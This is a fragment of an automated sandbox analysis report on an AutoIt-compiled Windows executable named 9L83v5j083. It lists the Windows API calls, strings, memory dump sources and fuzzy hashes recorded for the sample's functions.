                                                                                                                  • Instruction Fuzzy Hash: C502B470A042498FEF14CF69C9906AEBBF2FF85304F2481AED8459B341D7399946CB55
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                  • String ID: AU3_FreeVar
                                                                                                                  • API String ID: 2634073740-771828931
                                                                                                                  • Opcode ID: 923fa0a7059ff83e982d885d87b1b243233484feeca3d047820b52f06f013e18
                                                                                                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                  • Opcode Fuzzy Hash: 923fa0a7059ff83e982d885d87b1b243233484feeca3d047820b52f06f013e18
                                                                                                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                  • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                    • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                  • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                  • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                  • API String ID: 2294789929-1287834457
                                                                                                                  • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                  • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                  • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                  • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                  • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                  • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                  • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                  • API String ID: 2483343779-2107944366
                                                                                                                  • Opcode ID: 8242c973631ce46dc2107a793a2d3124409766f4a4f9f3ff38e174e62d65e23e
                                                                                                                  • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                  • Opcode Fuzzy Hash: 8242c973631ce46dc2107a793a2d3124409766f4a4f9f3ff38e174e62d65e23e
                                                                                                                  • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                  • _wcslen.LIBCMT ref: 00450720
                                                                                                                  • _wcscat.LIBCMT ref: 00450733
                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                  • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                  • String ID: -----$SysListView32
                                                                                                                  • API String ID: 4008455318-3975388722
                                                                                                                  • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                  • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                  • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                  • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                  • GetParent.USER32 ref: 00469C98
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                  • GetParent.USER32 ref: 00469CBC
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 2360848162-1403004172
                                                                                                                  • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                  • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                  • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                  • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469E71
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469E82
                                                                                                                  • GetParent.USER32 ref: 00469E96
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111), ref: 00469E9D
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00469EA3
                                                                                                                  • GetParent.USER32 ref: 00469EBA
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469EC1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 2360848162-1403004172
                                                                                                                  • Opcode ID: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                  • Instruction ID: 3a0c9dd1fa5fd4c1d1a647422213a645dfa1e4764d365342f395b6f430504e68
                                                                                                                  • Opcode Fuzzy Hash: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                  • Instruction Fuzzy Hash: D121F7716001187BDB00ABA9CC85BBF77ACEB85310F00855FFA44EB2D5D6B8DC4587A5
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 262282135-0
                                                                                                                  • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                  • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                  • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                  • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 312131281-0
                                                                                                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                  • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                                                                  • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                                                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3771399671-0
                                                                                                                  • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                  • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                  • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                  • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2156557900-0
                                                                                                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                  • API String ID: 0-1603158881
                                                                                                                  • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                  • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                  • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                  • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                  APIs
                                                                                                                  • CreateMenu.USER32 ref: 00448603
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                  • IsMenu.USER32(?), ref: 004486AB
                                                                                                                  • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                  • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 161812096-4108050209
                                                                                                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
